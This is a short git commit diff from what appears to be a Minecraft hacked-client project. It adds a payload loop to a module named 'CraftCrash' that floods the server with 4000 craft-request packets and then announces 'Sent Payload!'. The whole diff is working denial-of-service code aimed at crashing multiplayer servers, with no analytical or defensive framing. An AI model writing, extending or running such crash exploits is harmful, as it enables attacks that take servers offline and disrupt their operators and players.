This commit is contained in:
Saturn5Vfive 2022-04-27 23:27:04 -05:00
parent 5613aa913f
commit f00b3f0ddb

View file

@ -68,6 +68,10 @@ public class CraftCrash extends Module {
}
if(ticks % 75 == 0){
Notification.create(1000, "CraftCrash", Notification.Type.SUCCESS, "Sent Payload!");
for(int i = 0; i < 2000; i++){
client.player.networkHandler.sendPacket(new CraftRequestC2SPacket(sync, stick, true));
client.player.networkHandler.sendPacket(new CraftRequestC2SPacket(sync, buton, true));
}
this.setEnabled(false);
}
}